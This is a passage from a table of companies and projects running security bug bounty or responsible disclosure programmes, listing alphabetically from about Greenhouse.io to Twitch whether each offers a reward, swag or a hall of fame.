[TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Greenhouse.io [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Grok Learning [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] HackerOne [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Hack For Cause [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] HakSecurity [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Harmony [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Helpscout [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward swag] [TD] Heroku [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Hex-Rays [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] HoneyDocs [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Honeywell [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Hootsuite [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] HTC [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Huawei [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Hybrid Saas [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] IBM [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] ICEcoder [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Iconfinder [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] iFixit [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Indeed [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Informatiebeveiliging [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] ING NL [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward swag] [TD] Instagram [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] IntegraXor (SCADA) [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Internetwache [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] ITRP [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Joomla [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] jruby [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Juniper [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Kadince [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Kaneva [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Kayako [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Keming Labs [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Khan Academy [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] KPN [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Kraken [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Laer [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] LastPass [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] LaunchKey [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Librato [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Lievensberg Hospital [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Liferay [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] LinkedIn [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Localize [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Logentries [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Lookout [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] MacOS X Bitcoin LevelDB data corruption issue [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Magento [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Magix AG [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Mahara [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] ManageWP [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Mandrill App [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Marktplaats [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] MCProHosting [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Mega.co.nz [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Meldium [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Meraki [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Microsoft (bounty programs) [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Microsoft (Online Services) [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Microweber [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Millsap Independent School District [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Modus CSR [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Moneybird [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Moodle [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Motorola [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Movember [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Movielee [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward swag] [TD] Mozilla [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Myntra [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] MyStuff2 App [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Namazu [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward swag] [TD] National Cyber ??Security Center (Netherlands) [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Netagio [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Netflix [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Net Worth Pro [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Nitrous.IO [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Nokia Siemens Networks [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Norada [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] NSN Nokia Solutions Networks [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Nvidia [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Oculus [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Offers.com [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward swag] [TD] Olark [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Onavo [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] OnePageCRM [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] OpenBSD [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Openclass Knowledge Base [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] OpenText [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Opera [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Oracle [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Orkut [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] PagerDuty [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Pantheon [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Panzura [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Parse [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Paychoice [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Paymill [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Paypal [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Pidgin [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] PikaPay [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Pinoy Hack News [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Pinterest [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Piwik [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Pocket [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Polar SSL [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] PostmarkApp [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Prezi [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] PullReview [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Puppet Labs [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] PureVPN [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Qiwi [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Qmail [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Qualcomm [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Rackspace [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Reddit [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] RedHat [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Regiobank NL [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Relaso [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Ribose [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Ripple [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Riskalyze [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] Risk.io [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Salesforce [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Samba [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Samsung [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] SBWire [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame swag] [TD] Schuberg Philis [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Scorpion Software [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Security Net [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Segment.io [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Sellfy [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] ServiceRocket [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Shopify [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Silent Circle [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Simple [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Simplify [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] SiteGround [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Skuid [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Smart Budget [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] SmileznHapiez [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] SNS Bank NL [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Sonatype [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Sony [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Soundcloud [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] SplashID [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Splitwise [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] Spotify [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Sprout Social [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Square [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward swag] [TD] StatusPage.io [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Sunrise [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Symantec [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Tagged [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Tapatalk [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Tarsnap [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Team Unify [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Tele2 [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Telegram [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Tesla [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] The Humble Bundle [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Trade Only [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Tresorit [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Tuenti [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Tumblr [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Twilio [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Twitch [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: 